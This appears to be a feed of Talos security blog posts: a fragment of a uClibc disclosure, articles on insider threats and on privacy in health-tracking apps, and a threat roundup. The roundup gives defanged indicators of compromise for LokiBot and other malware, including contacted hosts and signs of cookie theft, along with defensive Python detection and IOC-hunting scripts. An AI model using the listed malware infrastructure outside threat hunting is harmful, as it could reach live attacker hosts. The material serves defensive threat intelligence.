Many embedded devices use this library, but Talos specifically confirmed that the Anker Eufy Homebase 2, version 2.1.8.8h, is affected by this vulnerability. Anker confirmed that it has patched this issue. uClibc has not issued an official fix; we are disclosing this vulnerability in accordance with Cisco’s 90-day vulnerability disclosure policy. Talos tested and confirmed that the following software is affected: uClibc version 0.9.33.2 and uClibc-ng version 1.0.40. 

Insider Threats: Your employees are being used against you

22 September 2022 at 11:58
By Nick Biasini.
  • Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year.
  • Social engineering should be part of any organization’s policies and procedures and a key area for user education in 2023 and beyond.
  • Mitigating these types of risks includes education, user and access controls, and ensuring that proper processes and procedures are in place if and when employees leave the organization.

Traditionally, attackers try to leverage vulnerabilities to deliver malicious payloads via exploitation. But more recently, that activity has shifted away from exploitation and consistently moved closer and closer to the user. Initially, threat actors loved to trick users into enabling malicious macros in Microsoft Office documents, but as Microsoft moves to blunt the effectiveness of macros, adversaries are always going to move to the next avenue to generate malicious revenue. This is where insider threats come into play. There are two broad categories of insider threats: the malicious insider and the unwitting asset. Both present unique challenges in detection and prevention for defenders and organizations’ IT admins. 


Malicious Insiders

There are a variety of reasons a user may choose to become a malicious insider, and unfortunately, many of them are occurring today. Let’s start with the most obvious: financial distress. When a user has a lot of debt, selling the ability to infect their employer can be a tempting avenue. We’ve seen examples of users trying to sell access into their employers’ networks for more than a decade, having spotted them on dark web forums. The current climate is, unfortunately, ripe for this type of abuse. The economy is on the brink of a recession, inflation continues to spike, and the cryptocurrency markets have lost as much as 70% of their peak value from late 2021. Combined, these factors can create an environment where employees are susceptible to coercion, putting the enterprise at risk.

Financial distress is a serious concern for employee compromise as evidenced by the fact that nearly half of the security clearance denials in the U.S. have to do with financial considerations. It is also a common factor in clearances being revoked, clearly demonstrating the risk it can present. This financial distress can also be leveraged by adversaries to force users to take actions they would not have otherwise by threatening to expose the issues publicly.

Financial distress isn’t the only factor that could drive an employee to turn against their employer. In today’s highly polarized political climate, the risk that an employee may take malicious action against their employer due to a perceived political stance from the employer is ever present. These could be spurred on by the action or inaction organizations take related to a piece of legislation or other societal issues. These risks, although less common than financial distress, present unique challenges to employers as they try to navigate the current political climate and the lead-up to the 2024 presidential election.

The final risk for enterprises comes from employees that have recently left the organization — especially if the separation was not mutual. Employees that have been forced to resign or fired from their jobs may take matters into their own hands. It’s this group that is typically focused on destruction that can really wreak havoc inside an organization.

At the least, malicious insiders may be willing to click links, open attachments, plug in a USB drive, or hand over credentials. In a worst-case scenario, if the malicious insider has an elevated level of access, the effects could be devastating. This is the primary insider threat organizations face, but they also need to be prepared for the user that is being used as an unwitting asset, typically via social engineering.


Unwitting Assets

This other category of insider threat is the more challenging of the two to deal with, as these users likely aren’t aware they are acting maliciously. Social engineering attacks are on the rise, and we see social engineering becoming a more prominent part of the attack lifecycle as we continue to improve things like exploit detection and prevention. Social engineering attacks are those that focus on leveraging the user to aid in the infection, typically through some form of manipulation. It played a role in the recently disclosed incident affecting Cisco, as well. Social engineering has some obvious applications, as we’ve seen repeatedly in the Business Email Compromise (BEC) space. It isn’t uncommon, especially for the more sophisticated groups, to open with a request for a phone number to discuss an issue further.
Example of Business Email Compromise (BEC) campaign leveraging social engineering

The attackers have realized that if they can get a potential target on the phone, it’s far easier for them to extract money, as people tend to want to help and can be better manipulated over the phone. This is far from the only way users are becoming unwitting assets.

As we continue to deploy multi-factor authentication (MFA), attackers are getting better at evading it, commonly through social engineering. Through our investigations, we have found numerous examples where attackers pose as IT Support or Security Operations inside an organization and call the victim, using social engineering to get them to accept the MFA request as they are sending it to the device. This was similar to the approach we saw taken in the recently disclosed attack against Cisco, where voice phishing played a role in the sophisticated attack, illustrating how once attackers have people on the phone, they can more easily manipulate them.

The other space where social engineering attacks have been occurring at pace is the cryptocurrency and Web 3.0 space, even though the value of cryptocurrencies has cratered recently. Cisco Talos has talked at length about the ways scams have emerged in Web 3.0, and social engineering attacks against NFT/cryptocurrency users are increasingly common. Users are commonly approached if they post about having issues with their accounts, with criminals waiting to defraud them of whatever value they have in their wallets. These attacks are widespread: as users posting anything related to issues with MetaMask can attest, the scammers will find you quickly. Most of the time it seems innocuous, with the adversary asking the target to fill out a form, but in the end, adversaries are after the user’s mnemonic password, allowing the attacker to empty the wallet with little recourse for the victim.


Example "support" form asking for MetaMask mnemonic password


Defending against insider threat

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost, they typically are allowed to access the network and have valid login credentials. This is where traditional security controls like user and access control come into play. Organizations should limit the amount of access a user has to the minimum required for them to perform their job. This should prevent them from accessing documents or systems that they shouldn’t and, along with proper alerting logic, should generate alerts if they attempt to access something they shouldn’t. Users make mistakes and click things occasionally, but a user being denied 15 - 20 times in a short period should be investigated.

Additionally, administrators should ensure that the organization has proper defense-in-depth and is inspecting laterally across the organization and not just analyzing traffic traversing your boundary or going north/south. This will ensure if the user is being leveraged to help the attackers, whether willing or otherwise, there are solutions in place to detect and block it. 

This is also where routine auditing can play a role. It’s common for an account to be created for testing or other purposes and then forgotten; these types of accounts can be devastating if missed. Additionally, regularly auditing the access users and groups have can eliminate things like access hoarding, group sprawl and permission creep, which result in users having far more access than they should.

For those organizations that deal with financial transactions, ensure that there is a system of checks and balances in place so no single person can initiate and complete a wire transfer or other significant movement of funds without additional oversight and approval. Too often we have seen organizations without these types of controls lose significant amounts of money via BEC or another financially motivated social engineering attack.

Finally, there is the issue of what to do when someone leaves the organization. There are some obvious steps like disabling their accounts and ensuring they can’t connect to the enterprise remotely through VPN. However, less obvious is ensuring the user doesn’t have any existing connections and, in today’s hybrid work world, it’s likely they will still have access to company assets, including laptops and other systems. Implementing a mechanism to wipe those systems remotely will be important, as well.

There are additional steps organizations need to take, specifically for users with an increased level of access. Rotate shared credentials — in a perfect world, this wouldn’t be an issue, but we’ve all worked in organizations where shared credentials are a thing and can commonly be abused by recently departed team members. Along those same lines, rotate any cloud credentials. Today, almost all organizations have some or most of their data hosted in the cloud and there are ways to access that data from outside the organization. These lines of access should be addressed when key employees leave the organization. 

One final step is to create detection logic to look for login attempts from disabled users. This will at least give admins some indication that a former employee could be attempting to establish access. Likewise, admins and defenders should ensure that service accounts cannot log in directly, which can be configured via Group Policy, as they can also be abused by a malicious insider if misconfigured, resulting in an elevated level of access ripe for abuse.
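The two detections recommended above (a user being denied access many times in a short period, and logon attempts from accounts that offboarding has already disabled) share the same log-parsing step, so here is one added example that implements both over constructed telemetry. This is illustrative code written for this article, not Talos tooling: the `timestamp key=value` log format, the event names `ACCESS_DENIED` and `LOGON_ATTEMPT`, the 15-denial threshold (the low end of the 15 - 20 range above) and the 10-minute sliding window are all assumptions, and the account names and paths are made up.

```python
"""Two insider-threat detections over a constructed event log.

Added example, not Talos code. Log format, event names, threshold and window
are assumptions chosen to illustrate the two checks described in the text.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumptions: the article suggests investigating 15-20 denials "in a short
# period"; we take the low end and a 10-minute sliding window.
DENIAL_THRESHOLD = 15
DENIAL_WINDOW = timedelta(minutes=10)

# Constructed list of accounts already disabled by offboarding (lower-case).
DISABLED_ACCOUNTS = {"bob", "svc_legacy"}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.+)$")


def parse_log(text):
    """Parse 'ISO-timestamp key=value key=value ...' lines into (datetime, dict),
    sorted by time so the sliding window below sees events in order."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        ts = datetime.fromisoformat(m.group("ts"))
        fields = dict(tok.split("=", 1) for tok in m.group("kv").split() if "=" in tok)
        events.append((ts, fields))
    return sorted(events, key=lambda e: e[0])


def flag_denial_bursts(events, threshold=DENIAL_THRESHOLD, window=DENIAL_WINDOW):
    """Return {user: time the threshold was first reached} for users whose
    ACCESS_DENIED count inside any sliding `window` reaches `threshold`.
    Occasional denials (a user clicking the wrong share) never trigger."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, f in events:
        if f.get("event") != "ACCESS_DENIED":
            continue
        user = f["user"].lower()
        q = recent[user]
        q.append(ts)
        while q and ts - q[0] > window:  # drop denials older than the window
            q.popleft()
        if len(q) >= threshold and user not in flagged:
            flagged[user] = ts
    return flagged


def flag_disabled_logons(events, disabled=DISABLED_ACCOUNTS):
    """Return (time, user, source) for every logon attempt by a disabled account:
    a former employee (or someone holding their credentials) probing for access."""
    return [(ts, f["user"].lower(), f.get("src", "?"))
            for ts, f in events
            if f.get("event") == "LOGON_ATTEMPT" and f["user"].lower() in disabled]


# --- constructed sample telemetry -------------------------------------------
BASE = datetime(2022, 9, 22, 9, 0, 0)


def _line(ts, **fields):
    return f"{ts.isoformat()} " + " ".join(f"{k}={v}" for k, v in fields.items())


def build_sample_log():
    """Constructed events: one real burst, one slow trickle, one disabled-account logon."""
    lines = []
    for i in range(16):  # alice: 16 denials in under 4 minutes -> burst
        lines.append(_line(BASE + timedelta(seconds=15 * i), user="alice",
                           event="ACCESS_DENIED", resource=f"\\\\fs01\\finance\\q3_{i}.xlsx"))
    for i in range(15):  # dave: 15 denials spread over 3 hours -> not a burst
        lines.append(_line(BASE + timedelta(hours=1, minutes=12 * i), user="dave",
                           event="ACCESS_DENIED", resource="\\\\fs01\\hr\\reviews.docx"))
    lines.append(_line(BASE + timedelta(minutes=30), user="bob",
                       event="LOGON_ATTEMPT", src="10.0.0.45"))
    lines.append(_line(BASE + timedelta(minutes=31), user="erin",
                       event="LOGON_ATTEMPT", src="10.0.0.46"))
    return "\n".join(lines)


if __name__ == "__main__":
    evs = parse_log(build_sample_log())
    print("denial bursts:", flag_denial_bursts(evs))
    print("disabled-account logons:", flag_disabled_logons(evs))
```

The sliding window matters: dave accumulates the same 15 denials as alice but over three hours, which is the "mistakes and misclicks" pattern the text says to tolerate, while alice's burst inside a few minutes is what should page someone. The disabled-account check is deliberately a plain set lookup; the value comes from keeping `DISABLED_ACCOUNTS` in sync with the offboarding process rather than from any cleverness in the code.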

Regarding unwitting assets, the key is user education. Enterprises should include social engineering attacks as part of their red teaming or other pentesting that occurs regularly. Additionally, they should roll out specific training to employees to educate them on social engineering. This needs to include what normal MFA activity looks like, the ways that support would contact users and the types of things you should never share, and finally, for financial organizations/departments, understanding how money transfers should be handled and vetted.


Insider threats increasing

Over the past six months to a year, we have seen an increasing amount of incident response engagements involving malicious insiders and unwitting assets being compromised via social engineering. As we continue to improve the ways we can detect and stop active exploitation and as macros are slowly removed from the landscape, the options for adversaries are going to dwindle. 

Adversaries will always take the path of least resistance: historically that meant active exploitation, more recently it fell to maldocs, and in the future it’s likely to fall increasingly to social engineering attacks and turning a user into a malicious insider. Unfortunately, as the payouts have shown, the amount of money at play is significant, and they will likely find users willing and able to take that leap to the dark side.


Our current world, health care apps and your personal data

20 September 2022 at 14:00

What does your autonomy mean to you?



By Ashlee Benge and Jonathan Munshaw.

  • After the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization, the use of third-party apps to track health care has recently come under additional scrutiny for privacy implications.
  • Many of these apps have privacy policies that state they are authorized to share data with law enforcement investigations, though the exact application of those policies is unclear.
  • The use of health-tracking apps and wearable tech is rising, raising questions around the application of the 14th Amendment’s equal protection clause and HIPAA rules as to who can and cannot collect and share health care information. 

It’s become second nature for many users to blindly click on the “Accept” button on an app or website’s privacy policy and terms of service. But in the wake of the U.S. Supreme Court’s ruling in Dobbs v. Jackson Women’s Health Organization that reversed previous interpretations of the 14th Amendment on privacy from Roe v. Wade, users of sensitive health apps need to be mindful of the kinds of data these apps keep, sell and share. It is a privacy ruling at its core, with the decision raising concerns about the government’s ability to access our personal and private information. With today’s digital surveillance infrastructure, coupled with new and existing laws, digital health histories are nearly impossible to protect.

The use of health data tracking applications and wearable tech has rapidly increased in the past several years. These apps track a hodgepodge of data, from heart rate and blood oxygen level, to when and where a user works out, to what a user eats. Some of these fitness applications even track more sensitive data like sexual activity, body composition using progress photos, and sleep cycles. Blood glucose levels can be tracked continuously using a wearable sensor and app rather than routinely timed finger pricks. 

Privacy policies are only so private

Although there are stringent laws regarding the use of personally identifiable information tied to health records, there are grey areas in the way this legislation applies to the data collected by healthcare apps. Additionally, if the servers of these apps are breached or otherwise compromised, there may be no liability to the app. This breached data is often sold on readily accessible marketplaces. But even if there’s no breach or illicit use of this information, apps and their creators can still learn a great deal about users. 

When health data collected by these apps is combined with other datasets like location data and what is available on social media profiles, advertisers, law enforcement agencies and more can craft a shockingly comprehensive view into the user’s life. In some instances, this inferred profile can be used for nefarious purposes, even resulting in criminal charges. Even prior to recent rulings, police in Nebraska launched an investigation using Facebook messages, eventually leading to criminal charges. In July 2021, a Catholic publication used location data tied to Grindr activity, purchased from a data aggregator, to allege that a high-ranking bishop was potentially gay. This allegation ultimately led to the bishop’s resignation.

Some of the most sensitive data tracked by users of health apps is in period and pregnancy tracking apps. These apps track things like period timing and symptoms, user-provided notes and comments, ovulation periods for those who are trying to get pregnant, and fetal growth process throughout pregnancy. Many of these apps state that they do not sell or share user data in their privacy policies. However, there are often exceptions for law enforcement requests. In the aforementioned case in Nebraska, Meta, Facebook’s parent company, complied with the investigation by giving law enforcement data on two people involved in compliance with its privacy policy and regulations.

PII on especially sensitive apps

Since the ruling, there have been continuous calls for users to delete apps tracking this information. Although laws like HIPAA in the United States stringently regulate the use and sharing of health records by traditional providers, these laws do not apply in the same manner to third-party health apps. These apps function as what is called a “designee,” and in some cases, can share data provided by users without their direct consent. This is because health tracking apps are considered “non-covered entities.” 

HIPAA only applies to covered entities, defined as health plans, healthcare clearinghouses, and specifically defined providers and associates. Apps typically do not fall within these definitions unless they are provided by a user’s insurance company or healthcare provider. Because HIPAA does not apply and there is limited legislation preventing it, these apps are free to sell and share your personal health data in a way that your doctor cannot.

Privacy watchdog organizations fear that, with this ruling, the laws around data sharing could be loosened. The right to privacy, interpreted to be provided by the 14th Amendment (along with others), has been used as precedent for a myriad of other laws outside of women’s reproductive rights, such as the legalization of same-sex marriage in the U.S. Privacy watchdogs are speculating that undermining these rights could allow for the sharing of personally identifiable health records to be used to determine insurance rates, with higher rates for individuals deemed to be high risk, or even for health records to be shared with current or prospective employers. In a world with no regulations against the sharing of health records on health apps, your medical diagnoses, or the level of risk inferred from your nutrition or workout trackers, could be used against you.

Without legislation preventing the sharing of your health data, app privacy policies are the only barrier to your data being shared or sold without your consent. These privacy policies tend to vary between individual apps, however. 

What some popular apps’ policies say

Screencap of a portion of What to Expect's privacy policy taken on Aug. 10, 2022.
What to Expect is one of the most popular pregnancy apps currently available on all platforms. This app is widely used by users who are either currently pregnant or trying to become pregnant, ranked No. 52 in Health and Fitness on the Apple app store, with nearly 300,000 positive reviews. In addition to data actively provided to the app, the app’s Privacy Policy states several other layers of personally identifiable information (PII) are collected, including the user’s expected due date, any photographs posted to the app, demographic information like gender and age, contact details, location information and “any views or opinions you provide to us.” 

However, the app’s policies also state it will process that information when “conducting investigations where necessary” and in “compliance with applicable law.” The policy also states:

"We may disclose your User Information to legal and regulatory authorities; our external advisors; parties who Process User Information on our behalf (“Processors”); any party as necessary in connection with legal proceedings; any party as necessary for investigating, detecting or preventing criminal offenses; any purchaser of our business; and any third party providers of advertising, plugins or content used on the Services."

Other apps and services have overhauled and strengthened their privacy and data-sharing policies in response to changing abortion laws.

Flo, a popular period tracking app, recently announced a new “anonymous” mode that will allow users to completely remove their personal and device information from the app and leave the company without any access to their data should a law enforcement agency request it. 

"If Flo were to receive an official request to identify a user by name or email, Anonymous Mode would prevent us from being able to connect data to an individual, meaning we wouldn't be able to satisfy the request," the company’s CEO said in an email to users announcing the new features. 

For any users not using Anonymous mode, Flo’s default privacy policy permits the app to share PII with a third-party advertising company, AppsFlyer, which then uses that information to generate curated ads on several other platforms, such as the social media app Snapchat and Google sites. 

Information from the Flo app regarding the sale of users' data for advertising purposes.
Astrology-focused menstrual tracking app Stardust also announced earlier this year that it changed its privacy policy to clarify that it would not provide user data if requested by law enforcement. And Clue, a European-based app that tracks menstrual cycles and pregnancies and offers its own form of birth control, says it will not cooperate with any U.S.-based law enforcement investigations.

For other, less-recognized apps, policies vary greatly and leave the door open for data-sharing with law enforcement if users are not careful about investigating their privacy policies and information-sharing agreements. 

On the Android app store, searching for “Period tracker” surfaces several non-mainstream apps as top results, such as “Period Calendar Period Tracker.” That app offers users predictions on when their next period will begin, peak ovulation times and any symptoms they’re experiencing on specific days and times. 

The app’s privacy policy states that it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only."

The app’s Android store page does advertise that it doesn't share any data with other companies or organizations, though some of the service providers they partner with might sell it.

The store page for the app also contains an image claiming that it is “Verified by Privacy International,” a U.K.-based privacy-focused non-profit organization. Period Calendar Period Tracker was mentioned in a 2019 study listing which period-tracking apps did or did not share data with Facebook — at the time, the app did not share information with Facebook. However, a representative from Privacy International told Talos the organization has no relationship with the app, nor does it verify or certify certain apps based on their privacy policies.


Things to consider when downloading health care-related apps

As data privacy law changes rapidly, users should be more mindful of the types of information and data they share with these apps. Outside of switching to a traditional pen-and-paper calendar method, there are a few tips users can follow when considering using an app that tracks health data of any kind, particularly the kinds of sensitive data tracked by period or pregnancy tracking apps:

  • Carefully evaluate privacy policies before downloading and using an app, and don’t hesitate to reach out to listed contacts for additional information. Be aware that if an app’s privacy policy does not include a section titled “Notice of Privacy Practices for Protected Health Information," HIPAA does not apply, and there is limited legislation preventing the app from selling or sharing your health data. 
  • Be mindful about the types of information you share with these apps and evaluate your level of risk were this information to become public. Ensure you are only sharing information with these apps that you are comfortable with potentially becoming public without your consent.
  • If allowed by the app, opt out of all data collection and information sharing. Many apps will offer this option because of GDPR rules in Europe or California’s recently passed California Consumer Privacy Act.
  • Only download apps from trusted stores and trusted developers.
  • Use anonymous modes if offered by the app.

Note: Representatives from Period Calendar Period Tracker and What to Expect did not respond to a request for comment via emails sent to their publicly listed contact information in the respective apps’ privacy policies.


Threat Roundup for September 9 to September 16

16 September 2022 at 17:24

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 9 and Sept. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
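The indicators in the tables below are published defanged (`[.]` in place of `.`), so before they can be compared with DNS or proxy telemetry they have to be refanged and split by type. The following is an added example of that workflow, written for this page and not part of Talos's tooling or the accompanying JSON: the indicator values are copied from the LokiBot entry below, while the `timestamp source key=value` log format and the client addresses are constructed for the demonstration. As the roundup itself cautions, a hit on a contacted IP or domain (icanhazip[.]com, for instance, is a widely used benign service) is a hunting lead to triage, not a verdict.

```python
"""Refang the defanged IOCs from a Threat Roundup and hunt for them in logs.

Added example, not Talos code. The log format below is constructed for the
demonstration; the indicator values are copied from this roundup's LokiBot
entry. A match is a lead to investigate, not a verdict: the roundup notes that
contacted IPs and domains do not by themselves indicate maliciousness.
"""
import ipaddress
import re

# Indicators as published (defanged with "[.]"), taken from the LokiBot tables.
DEFANGED_IOCS = [
    "111[.]118[.]215[.]251",
    "104[.]18[.]114[.]97",
    "icanhazip[.]com",
    "mail[.]mayhighfilms[.]com",
    "www[.]awesomegih[.]net",
]


def refang(ioc):
    """Undo common defanging so the value can be compared with live telemetry."""
    s = ioc.strip().lower()
    for bad, good in (("[.]", "."), ("(.)", "."), ("[dot]", "."),
                      ("hxxp://", "http://"), ("hxxps://", "https://")):
        s = s.replace(bad, good)
    return s


def classify(value):
    """'ip' for IPv4/IPv6 literals, otherwise 'domain'."""
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        return "domain"


def load_iocs(defanged):
    """Split a defanged list into (ips, domains) sets ready for matching."""
    ips, domains = set(), set()
    for raw in defanged:
        v = refang(raw)
        (ips if classify(v) == "ip" else domains).add(v)
    return ips, domains


# Fields we look at: DNS query names and proxy/firewall destinations.
FIELD_RE = re.compile(r"\b(?:query|dst|host)=(\S+)")


def match_line(line, ips, domains):
    """Return [(kind, value)] for every indicator hit on one log line.
    Domains match exactly or as a parent of the observed name."""
    hits = []
    for value in FIELD_RE.findall(line):
        v = value.lower().rstrip(".")  # tolerate trailing-dot FQDNs
        if v in ips:
            hits.append(("ip", v))
        elif v in domains or any(v.endswith("." + d) for d in domains):
            hits.append(("domain", v))
    return hits


def hunt(log_text, defanged=DEFANGED_IOCS):
    """Return [(timestamp, hits)] for lines containing at least one indicator."""
    ips, domains = load_iocs(defanged)
    results = []
    for line in log_text.splitlines():
        hits = match_line(line, ips, domains)
        if hits:
            results.append((line.split()[0], hits))
    return results


# Constructed sample lines in a made-up "ts source key=value" format.
SAMPLE_LOG = """\
2022-09-16T10:01:02 dns client=10.0.0.12 query=icanhazip.com
2022-09-16T10:01:05 proxy client=10.0.0.12 dst=111.118.215.251 url=http://111.118.215.251/
2022-09-16T10:02:10 dns client=10.0.0.20 query=www.example.com
2022-09-16T10:03:44 dns client=10.0.0.33 query=smtp.mail.mayhighfilms.com.
2022-09-16T10:04:00 proxy client=10.0.0.40 dst=104.18.114.97 url=https://104.18.114.97/
"""

if __name__ == "__main__":
    for ts, hits in hunt(SAMPLE_LOG):
        print(ts, hits)
```

Two design points are worth noting. Domain matching is a suffix match, so a query for a host under a listed name is still surfaced, but the match is anchored on a full label boundary (`"." + d`) so that a lookalike such as `notmail.mayhighfilms.com` does not match `mail.mayhighfilms.com`. And the IP set is compared against the `dst=` field only, not the URL text, so an IP that merely appears inside a page's content is not counted as a contact.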

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.LokiBot-9969312-0 Dropper Lokibot is an information-stealing malware designed to siphon sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from several popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Zeus-9969310-0 Dropper Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Dropper.Nanocore-9969309-0 Dropper Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Ransomware.Cerber-9969274-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber." In more recent campaigns, other file extensions are used.
Win.Dropper.DarkKomet-9969269-0 Dropper DarkKomet is a freeware remote access trojan released by an independent software developer. It provides the same functionality expected from a trojan, such as keylogging, webcam access, microphone access, remote desktop, URL download and program execution.
Win.Dropper.Ramnit-9969260-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It can also steal browser cookies and hides from popular antivirus software.
Win.Dropper.Kuluoz-9969050-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.Remcos-9969014-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. It is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.

Threat Breakdown

Win.Dropper.LokiBot-9969312-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA THUNDERBIRD 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\ENUM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\OWUZ370WDG 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\ENUM
Value Name: Implementing
1
Mutexes Occurrences
3749282D282E1E80C56CAE5A 1
-1L3OO7B8T5U3Hz8 1
86R24Q1820DI8G-5 1
0-RAP0BC8AFXV5YK 1
O926B232S79XBxBC 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
111[.]118[.]215[.]251 2
104[.]18[.]114[.]97 2
85[.]159[.]66[.]93 1
149[.]154[.]167[.]220 1
217[.]26[.]48[.]101 1
81[.]17[.]18[.]196 1
151[.]101[.]2[.]159 1
2[.]57[.]90[.]16 1
66[.]235[.]200[.]147 1
3[.]64[.]163[.]50 1
34[.]117[.]168[.]233 1
183[.]90[.]232[.]14 1
64[.]190[.]63[.]111 1
162[.]213[.]253[.]236 1
103[.]63[.]2[.]157 1
109[.]123[.]121[.]243 1
66[.]225[.]241[.]38 1
149[.]129[.]252[.]201 1
162[.]240[.]46[.]240 1
209[.]159[.]145[.]117 1
81[.]161[.]229[.]75 1
104[.]21[.]81[.]107 1
160[.]121[.]173[.]6 1
129[.]226[.]173[.]87 1
66[.]96[.]162[.]150 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
icanhazip[.]com 2
mail[.]mayhighfilms[.]com 2
www[.]awesomegih[.]net 1
www[.]european-resilience[.]org 1
www[.]eminefendipsikoloji[.]xyz 1
www[.]solutionsdr[.]website 1
www[.]jeuxjetx[.]fr 1
www[.]mjmedia[.]online 1
www[.]ct666666[.]com 1
www[.]aceyourexams[.]org 1
www[.]famallcameroon[.]com 1
www[.]kevinandboots[.]com 1
www[.]grupoprius[.]com 1
www[.]6298vip15[.]com 1
www[.]goinuffies[.]com 1
www[.]strcktunkea[.]xyz 1
www[.]wettenunseam[.]xyz 1
www[.]998899[.]lc 1
www[.]gurilab[.]com 1
www[.]825766[.]com 1
www[.]agenlexispkr[.]xyz 1
www[.]randrconstruction[.]site 1
mail[.]nu-meqa[.]com 1
www[.]tbwtaobao[.]org 1
www[.]nineodesign[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%ProgramFiles%\Microsoft DN1 1
%LOCALAPPDATA%\Microsoft Vision 1
%APPDATA%\D282E1 1
%APPDATA%\D282E1\1E80C5.lck 1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 1
%APPDATA%\ndwgxitf.y2z 1
%APPDATA%\Microsoft\Windows\TEMPLA~1\fgfhgf.exe 1
%APPDATA%\ndwgxitf.y2z\Firefox 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\A1EB383543D3F00657D7 1
%APPDATA%\Microsoft\Windows\Templates\BCRHYN5A.zip 1
\TEMP\f400n12e.0.cs 1
\TEMP\f400n12e.cmdline 1
\TEMP\f400n12e.err 1
\TEMP\f400n12e.out 1
\TEMP\f400n12e.tmp 1
\x5c\x55\x73\x65\x72\x73\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x5c\x41\x70\x70\x44\x61\x74\x61\x5c\x52\x6f\x61\x6d\x69\x6e\x67\x5c\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x5c\xac0e\xac27\xac09\xac17\xac18\xac18\xac10\xac0f\xac20\xac15\x2e\xac02\xac12\xac27\xac14\xac16\xac0d\xac05\xac1e\xac26\xac05 1
%APPDATA%\rxbyry3j.lyu 1
%APPDATA%\rxbyry3j.lyu\Firefox 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\gmzjfop1.kr5 1
*See JSON for more IOCs

File Hashes

